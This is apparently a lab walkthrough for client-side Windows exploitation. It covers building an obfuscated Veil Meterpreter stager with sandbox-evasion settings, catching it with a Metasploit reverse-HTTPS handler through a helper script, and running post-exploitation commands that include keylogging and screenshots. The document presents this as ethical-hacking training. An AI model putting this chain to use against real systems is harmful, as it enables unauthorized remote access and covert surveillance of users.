This project simulates a client-side Windows exploitation scenario using a custom backdoor payload generated via the Veil Framework. It demonstrates how an attacker can deliver a payload to a victim using social engineering, gain unauthorized remote access using Metasploit, and perform post-exploitation activities — all within a controlled, ethical lab environment.
- Simulate real-world client-side exploitation using ethical hacking tools.
- Demonstrate backdoor creation using Veil Framework.
- Deliver a reverse shell payload and gain access to a target Windows machine.
- Understand and visualize the attacker's perspective to improve defensive strategies.
| Tool/Technology | Purpose |
|---|---|
| Kali Linux | Attacker OS environment |
| Veil Framework | Generate obfuscated backdoor payload |
| Metasploit | Set up reverse shell listener (msfconsole) |
| Meterpreter | In-memory post-exploitation agent delivered by the payload |
| Windows 10 VM | Victim OS in virtual environment |
| VirtualBox/VMware | Virtual lab setup |
- Attacker Machine: Kali Linux (with Veil and Metasploit installed)
- Target Machine: Windows (virtual machine in same isolated network)
- Network: Host-only or internal network in virtualization software
- In the attacker VM, install Veil Framework from its official source.
- Veil is used here as a learning tool to demonstrate payload obfuscation/evasion within a lab.
- Launch Veil and choose the Evasion module.
- The Evasion module enables generation of obfuscated payload artifacts for lab testing.
- Inside Evasion, select a Meterpreter payload type (in this lab, the Go reverse-HTTPS stager).
- Meterpreter is Metasploit's in-memory post-exploitation agent. The executable Veil produces is only a stager: when run, it connects back to the handler, which then sends the full Meterpreter payload over that reverse channel.
```
> list                      # payload numbers vary by Veil version; here 15) go/meterpreter/rev_https.py
> use 15
```
- Configure the payload options for the lab session:
- LHOST: IP address of the attacker VM on the isolated lab network. This is the address the target VM connects back to, so it must be reachable from the target.
- LPORT: port the handler will listen on. The value is compiled into the stager, so changing it later means regenerating the payload.
- Record these values: the Metasploit handler must use the same payload type, LHOST and LPORT, or the stager's connection will never be caught.
```
> set LHOST <attacker-vm-ip>   # attacker VM address on the lab network
> set LPORT 8080
> set PROCESSORS 1             # run only if the host has at least this many CPUs (sandbox check)
> set SLEEP 6                  # pause this many seconds before connecting back (sandbox check)
```
- Generate the payload artifact within the attacker VM and save it securely for lab delivery.
- Important: Do not publish or upload the generated executable to public repositories.
```
> options                      # confirm LHOST/LPORT before generating
> generate                     # builds the backdoor executable
> rev_https_8080               # base name Veil prompts for; output is written under Veil's output directory
```
- Transfer the artifact to the target VM using a simulated delivery method appropriate for lab testing (mock email, USB attached to the VM, or a file share).
- This must only be done inside the isolated lab with explicit permission.
- On the attacker VM, launch the Metasploit console (msfconsole).
- Configure a multi/handler that matches the payload type, LHOST and LPORT used during generation. The Veil payload go/meterpreter/rev_https corresponds to windows/meterpreter/reverse_https in Metasploit.
- Start the listener to await incoming connections from the target VM.
```
$ msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_https
> set LHOST <attacker-vm-ip>   # same address set in Veil
> set LPORT 8080               # same port set in Veil
> show options                 # verify everything matches before starting
> exploit                      # add -j to run the handler as a background job
```
- When the target executes the artifact inside the lab, the stager initiates a reverse HTTPS connection to the attacker VM on LPORT.
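Because the handler must match the Veil settings exactly, it is worth setting LHOST, LPORT and the payload type in one place and deriving the handler configuration from them. The script below is an added example, not part of the original project or of Veil/Metasploit: it maps the Veil payload name to the corresponding Metasploit payload, validates the address and port, and writes a Metasploit resource file that msfconsole can load with `-r`. The function names and the address 192.168.56.10 are assumptions for the lab network.

```shell
#!/bin/sh
# Added example (not the project's own code): generate a Metasploit handler
# resource file from the same values used when generating the Veil payload.
# 192.168.56.10 and 8080 below are placeholders for an isolated lab network.

# Map a Veil Evasion payload name to the Metasploit payload the handler needs.
# Only the Meterpreter reverse payloads relevant to this lab are covered;
# rev_https is matched before rev_http so the shorter pattern cannot shadow it.
veil_to_msf_payload() {
    case "$1" in
        */meterpreter/rev_https*) echo "windows/meterpreter/reverse_https" ;;
        */meterpreter/rev_http*)  echo "windows/meterpreter/reverse_http" ;;
        */meterpreter/rev_tcp*)   echo "windows/meterpreter/reverse_tcp" ;;
        *) echo "unsupported Veil payload: $1" >&2; return 1 ;;
    esac
}

# Accept only a dotted quad with every octet in 0-255.
valid_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

# Accept only an integer TCP port in 1-65535.
valid_port() {
    echo "$1" | grep -Eq '^[0-9]+$' && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# write_handler_rc VEIL_PAYLOAD LHOST LPORT OUTFILE
# Writes a resource file that starts a background handler which stays up
# after the first session (ExitOnSession false), so repeated lab runs reuse it.
write_handler_rc() {
    msf_payload=$(veil_to_msf_payload "$1") || return 1
    valid_ipv4 "$2" || { echo "bad LHOST: $2" >&2; return 1; }
    valid_port "$3" || { echo "bad LPORT: $3" >&2; return 1; }
    cat > "$4" <<EOF
use exploit/multi/handler
set PAYLOAD $msf_payload
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# Usage: sh make_handler.sh go/meterpreter/rev_https.py 192.168.56.10 8080 handler.rc
# Then:  msfconsole -q -r handler.rc
if [ "$#" -eq 4 ]; then
    write_handler_rc "$1" "$2" "$3" "$4" && echo "wrote $4"
fi
```

The Veil side still has to be configured by hand, but with the values copied from the same invocation, a typo in the handler's LHOST or LPORT (the usual reason a session never arrives) is caught by the validators instead of silently producing a listener nothing connects to.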
- A Meterpreter session opens in the handler and is available for interactive analysis.
- Perform only non-destructive enumeration for learning:
- View basic system information (OS, hostname, IP).
- List running processes.
- Enumerate users and privilege levels.
- Avoid any actions that would cause harm, persist beyond the lab, or exfiltrate sensitive data. The keystroke and screen-capture commands shown below collect whatever the user types and sees, so run them only against the lab VM and delete the captured data when the exercise ends.
```
meterpreter > sysinfo          # OS, hostname, architecture
meterpreter > getuid           # user the session is running as
meterpreter > ipconfig         # interfaces and IP addresses
meterpreter > ps               # running processes
meterpreter > help             # full list of available commands
meterpreter > keyscan_start    # starts capturing keystrokes typed on the target
meterpreter > keyscan_dump     # displays the keystrokes captured since keyscan_start
meterpreter > keyscan_stop
meterpreter > screenshot       # saves an image of the target desktop to the attacker VM
```
Performing these steps outside an authorized lab is illegal and unethical. Ensure written authorization and follow institutional rules of engagement before conducting any testing.